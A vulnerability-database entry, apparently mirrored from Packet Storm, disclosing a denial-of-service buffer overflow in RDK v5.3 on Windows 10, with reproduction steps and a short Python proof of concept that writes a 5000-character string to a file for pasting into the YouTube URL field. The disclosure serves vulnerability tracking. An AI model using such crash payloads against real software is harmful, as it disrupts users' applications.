Lucene search
K

RDK 5.3 Buffer Overflow

🗓️ 11 Mar 2025 00:00:00Reported by Ahmet Ümit BayramType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 198 Views

RDK v5.3 has a buffer overflow vulnerability leading to a DoS attack on Windows 10 systems.

Code
Exploit Title: RDK v5.3 - Buffer Overflow (DoS)
    Discovered by: Ahmet Ümit BAYRAM
    Discovered Date: 17.04.2024
    Vendor Homepage: http://www.shenturk.com
    Software Link: http://www.shenturk.com/downloads/rdk-5.3-setup.rar
    Tested Version: v5.3 (latest)
    Tested on: Windows 10 32bit
    Steps to Reproduce
    
    Open the RDK application.
    Click on the "Plus" button.
    Select YouTube.
    Copy the contents of poc.txt and paste it into the "YouTube URL" field.
    Click Tamam to confirm.
    Locate the payload from the list and double-click it.
    The application should crash.
    
    Proof of Concept (PoC)
    
    The following script creates a poc.txt file containing a payload that
    causes a buffer overflow in RDK v5.3.
    
    #!/usr/bin/env python3
    
    exploit = ‘A’ * 5000
    
    try:
    with open("poc.txt", "w") as file:
    file.write(exploit)
    print("POC is created")
    except Exception as e:
    print("POC not created:", e)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Mar 2025 00:00Current
7.7High risk
Vulners AI Score7.7
198